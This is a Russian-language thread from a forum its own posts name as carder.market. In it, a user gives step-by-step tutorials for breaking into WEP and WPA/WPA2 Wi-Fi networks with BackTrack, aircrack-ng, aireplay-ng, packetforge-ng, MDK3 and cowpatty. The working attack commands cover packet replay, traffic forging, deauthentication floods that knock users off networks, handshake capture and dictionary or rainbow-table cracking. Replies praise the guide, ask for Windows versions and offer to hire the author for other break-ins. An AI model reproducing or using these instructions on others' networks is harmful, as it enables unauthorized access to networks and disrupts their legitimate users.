Wardriving[хек WPA/WEP]

Keltos

VIP member
Messages
678
Reputation
185
Reaction score
230
Points
43
Приветствую.
В данной статье я хотел рассказать вам как можно похекать wifi сетки с протоколами шифрования wep/wpa.
Начнем с дистрибутива, а именно нам нужен BackTrack.
Backtrack (далее bt) - уникальный инструмент, оценить который сможет каждый пользователь, которому интересна тема компьютерной безопасности, защиты и взлома сетей и систем. BackTrack представляет собой "живой" дистрибутив Linux, оснащённый доброй сотней специализированных утилит и программных пакетов для поиска и эксплуатации уязвимостей в персональных компьютерах и сетевых устройствах, работающих в самых различных условиях и конфигурациях. Долгое время этот продукт был известен под именем WHAX, а после слияния с другим аналогичным проектом (Auditor) получил своё нынешнее имя. Теперь он базируется на убунту 8.10.

Оффициальный сайт http://www.backtrack-linux.org/

На данный момент актуальная версия: BackTrack 5 RT3

Скачать далее подбираете под свою конфигурацию.

Установка несложная.
Нам понадобиться UNetbootin чтобы запилить образ на флешку. Скачать можно здесь
dc917371a62f783bd3f149fb07498088.png

Вобщем с настройкой UNetbootin все понятно, выбираете "Образ диска" затем путь к образу iso.

В буте делаем чтобы загрузился с флешки.
Затем в грубе выбираем Ubuntu 8.10..
bt login: root
Password: toor
затем запускаем иксы (граф. менеджер KDE по умолчанию) - startx.
Русифицировать систему можно так:
Хоть это и моветон, но коректное отображение русских символов в файлах и папках нам нужны.
Заходим в консоль и вводим:
Code:
# sudo aptitude update

Далее в одну строку:
Code:
# sudo aptitude install aspell-ru kde-i18n-ru language-pack-kde-ru language-pack-kde-ru-base language-pack-ru language-pack-ru-base language-support-ru myspell-ru
Закончим с установкой, перейдем к описанию девайсов.

Для этого дела я использовал компактный нетбук Asus EEE PC 1005 и wifi адаптер kasens g5000

Этот нетбук легкий и аккумулятор держит до ~7 часов.
Об адаптере, антена 10dBi, у самого адаптера мощность 2000mw
но как показала практика, iwconfig выдал 30dbm это ~800mw
опять китайцы на***ли меня.
©Keltos​

Написано специально для carder.market
 
Last edited:

Keltos

VIP member
Messages
678
Reputation
185
Reaction score
230
Points
43
Итак похек WEP.

Заходим в консоль вбиваем:
Code:
airmon-ng
Покажет нам список адаптеров устаноленных на компе. Это wlan0 или wlan1 в моем случае wlan1.
Вбиваем в консоли:
Code:
airmon-ng start wlan1
Затем увидите monitor mode enabled on mon0
Затем запускаем утилиту airodump‐ng, вбиваем:
Code:
airodump‐ng mon0





79711165jh9.jpg

На картинке все понятно описано что такое BSSID,CH,etc.

Итак мы видим точки доступа , выбираем к которой хотим подключиться (я выбрал с ESSID PARRA)
и останавливаем airodump‐ng командой ctrl+c (одновременно нажать ctrl и c ) появится
картинка (см.ниже)


Теперь можем запустить airodump‐ng для сбора информации от этой точки (см.выше). Вводим в консоли:
Code:
airodump‐ng –c 7 ‐ ‐ bssid 00:21:27:05:D0:3А –w PARRA mon0
Где –с номер канала нашей токи(CH) , ‐‐вssid eё mak адрес (BSSID) , ‐w файл в который будем
записывать перехваченные пакеты. Появится следующая картинка(см.ниже)


Открываем еще одну консоль, вбиваем:
Code:
aireplay‐ng ‐5 –b 00:21:27:D5:D0:3A –h 00:C0:CA:27:23:56 mon0
Где ‐5 способ атаки –b мак адрес точки которую атакуем
и –h мак адрес клиента подключеного к точке. Если клиента нет то можно и без него:
Code:
aireplay‐ng ‐5 –b 00:21:27:D5:D0:3A mon0.

Мы видим работу программы aireplay‐ng которая (внизу картинки мы видим) будет спрашивать
использовать этот пакет или нет? Жмём у , и затем ЕNTER. Итак нам понадобится открыть ещё
одну консоль №3. уже знаем как.Открываем и смотрим следующую картинкус названием
Коnsole<3>


В консоли 3 вбиваем:
Code:
aireplay‐ng – 1 1 –a 00:21:27:D5:D0:3A –h 00:C0:CA:27:23:56 mon0
опять‐же если нет клиента –h то без него
Code:
aireplay‐ng – 1 1 –a 00:21:27:D5:D0:3A mon0


В консоле3 после запуска утилиты aireplay‐ng с параметрами aireplay‐ng ‐1 1 –a 00:21:27:DA: итд
должны увидеть следующее (если нет то возможно точка доступа находится слишком далеко, в
конце утилита напишет возможные причины)


Теперь переходим назад в консоль №2(просто наводим на неё мышкой и щёлкаем один раз) и
там должны увидеть примерно следующее (см.ниже). Ждём пока не появится Got RELAYED
packet!! Saving keystream in fragment ‐0509‐ итд. ( см.следующую картинку)

Итак свершилось мы захватили и сохранили нужный пакет(см.внизу)он нам нужен что‐бы нагнать трафик. Запускаем утилиту расketforge‐ng.
packetforge‐ng ‐0 ‐a (мак адрес точки
которую атакуем) –h (мак адрес клиента подсоединённого к точке если клиента нет то пишем как на картинке внизу –h 00:11:22:33:44:55) –l 255.255.255.255 –k 255.255.255.255 -y
fragment(скопируйте и вставьте из строчки Saving keystream in fragment или сами напечатайте что
у вас там получится с xor. в конце) –w arpy


После ввода команды aireplay‐ng ‐3 ‐r arpy ‐b итд. Видим вот такое. Теперь заглянем в консоль
№1 самую первую(наведём мышку на неё и щёлкнем один раз).



Смотрим консоль№1 нас интересуют цифры в колонке дата (#Data, )видим 4507 это количество
собранных пакетов на этот момент. нам нужно от 20 000 и больше,ждём пока там появится
нужное нам количество. Ну вот (допустим набрали) переходим в консоль№2 останавливаем то
что там движется нажав ctrl+c и должно появится вот это


Выбираем наш файл в появившемся списке, он должен называться так как мы его записали в самом начале в команде
airodump‐ng ‐c7 ‐‐bssid (mac) ‐w PARRA mon0 и иметь расширение сар. . Затем запускаем aircrack‐ng . Вводим:
Code:
aircrack‐ng PARRA‐01.cap
Ждём когда aircrack найдёт пароль. Смотрим следующую картинку.

И вот что он нам нашёл. Наш ключ к сети edcba


©Keltos​

Написано специально для carder.market

Скоро будет описано как похекать WPA
 
Last edited:

Dimiy

BANNED
Messages
14
Reputation
0
Reaction score
0
Points
1
Please note, if you want to make a deal with this user, that it is blocked.
статья отличная, просто супер. Но слижком все мудрено это - . А для wpa2 есть?
 

Keltos

VIP member
Messages
678
Reputation
185
Reaction score
230
Points
43
статья отличная, просто супер. Но слижком все мудрено это - . А для wpa2 есть?

Скоро будет описано как похекать WPA
Туда и wpa 2 относиться
 

barbara

VIP member
Messages
268
Reputation
39
Reaction score
57
Points
28
Не люблю многословить,
но статья заслуживает уважения.
щас будем пробывать =)
 

Keltos

VIP member
Messages
678
Reputation
185
Reaction score
230
Points
43
Xek wpa/wpa 2

Вбиваем в консоли
Code:
airmon-ng

Выбриаем наш интерфейс это wlan 1
Code:
airmon-ng start wlan1

monitor mode enabled on mon0
адаптер переведен в режим мониторинга, указывается как mon0

У мну слишком много сеток, поэтому нам нужно только wpa
Code:
airodump-ng --encrypt wpa mon0

Если у вас не особо много сеток, достаточно будет
Code:
airodump-ng mon0

Вы видите такую картину


Выбираем нужную сеть, останавливаем airodmup-ng, ctrl+с или ctrl+z.

Теперь пишем airodump-ng -с 11(CH канал точка) --bssid (мак) -w имя данных перехвата. mon0 (ваш адаптер)


Нам нужно поймать handshake .
Попробуем программой aireplay-ng.

Основная функция программы заключается в генерации трафика для последующего использования в aircrack-ng для взлома WEP и WPA-PSK ключей. Существуют несколько различных атак, с помощью которых можно совершить: реассоциацию узлов с целью получения данных WPA handshake, поддельные аутентификации, интерактивное повторение пакетов (Interactive packet replay), вручную произвести инжектирование ARP-запросов и повторных ARP-запросов. С помощью инструмента packetforge-ng можно создавать произвольные пакеты.

aireplay-ng -0(деаутентификация) -50 (кол-во деаутентификаций можно ставить 100,200,и т.д.) -a(мак точки) mon0(ваш адаптер)

Если атака прошла успешно то вы увидите в консоли, в правом верхнем угло заветное слово HANDSHAKE




Не получилось, можно попробывать еще раз увеличив кол-во деаутентификаций.

Попробуем прогой MDK3.
Запускаем MDK3, вбиваем:
Code:
./mdk3 mon0 -a
-a (мак точки)
MDK3 - это прога отключит всех кто подключен к точке на короткое время, у нас будет возможность поймать HANDSHAKE



Вот что видим в первой коносли после запуска MDK3


но я опять не смог поймать handshake, оставил на ночь airodump-ng, проверил утром, был пойман handshake :)

После того как поймал handshake я заюзал cowpatty, итак:
./cowpatty -d(сюда подставляем хеш или rainbow.tab) -r(наш файл с хендшейком) -s(имя точки)
Если у вас нет хешей или радужных таблиц то вместо -d ставьте -f словарь с txt или lst

Вот что видим

Ключ найден за 41 секунду


Теперь ломаем с aircrack-ng
aircrack-ng -w(путь к словарю) затем вставляем наш .cap файл


 

Сумрак

VIP member
Messages
808
Reputation
94
Reaction score
103
Points
43
довольно интересно :) но любителей unix на этом форуме немного
может посоветуешь что нить под винду? :) существуют ли какие то варианты?
 

Keltos

VIP member
Messages
678
Reputation
185
Reaction score
230
Points
43
довольно интересно :) но любителей unix на этом форуме немного
может посоветуешь что нить под винду? :) существуют ли какие то варианты?

Под виндой не работал, т.к. дрова под антену не очень.

Но попробую что нибудь.

Ждите.:)
 

dublon

Carder
Messages
34
Reputation
1
Reaction score
1
Points
8
Да статья супер. Но под винду подобный мануал был бы интересней. Спасибо!
 

XaOC

VIP member
Messages
179
Reputation
12
Reaction score
41
Points
28
Да вот столкнулся с такой проблемой и нашёл решение...

How to: Install BackTrack 4 (Final) in VirtualBox = )
hxxxp://www.youtube.com/watch?v=CIwCcoRZ5jM
 
Last edited:

sud

Carder
Messages
92
Reputation
24
Reaction score
28
Points
18
XaOC, убери активную ссылку.
 

Nikkon

RIPPER
Messages
170
Reputation
12
Reaction score
13
Points
18
От статейки под винду не отказался бы.
Спасибо заранее!
 

____

DEER
Messages
421
Reputation
-33
Reaction score
21
Points
18
У РОБИНА С WPA ТУГО.
 

Merovingian

RIPPER
Messages
170
Reputation
27
Reaction score
43
Points
28
есть три ключа, помогите плз получить пароль. уже все перепробовал((
WEP KEY / WPA PMK
091DFF6553AE4F3B828E0A45466879B583CFB08FC79A175DF3F3D6D025D79DD5
E0BA5A11A1ED8BB18CE9FE697CB41A4F40D0286569CC56C1B84236E23966D2A4
A1AF8D2207F95E1C35A63CC2CDD5717E97555B60CC820ECBEFF0485B60E2ECD7

насколько понял, 504 битное шифрование...тип ключа wpa-psk
 

Niklimus

Professional
Messages
170
Reputation
6
Reaction score
7
Points
18
А через какие радужные таблицы можно пасс подбирать? Или хеши
 

Альфред

Professional
Messages
159
Reputation
18
Reaction score
18
Points
18
ТС ждем сабж под винду!
... напиши плз что еще сломать можешь? обратимся ...
 

Keltos

VIP member
Messages
678
Reputation
185
Reaction score
230
Points
43
если дистибутив запустить на вирулке все будет работать также?

Да

А через какие радужные таблицы можно пасс подбирать? Или хеши

_http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/
 
Top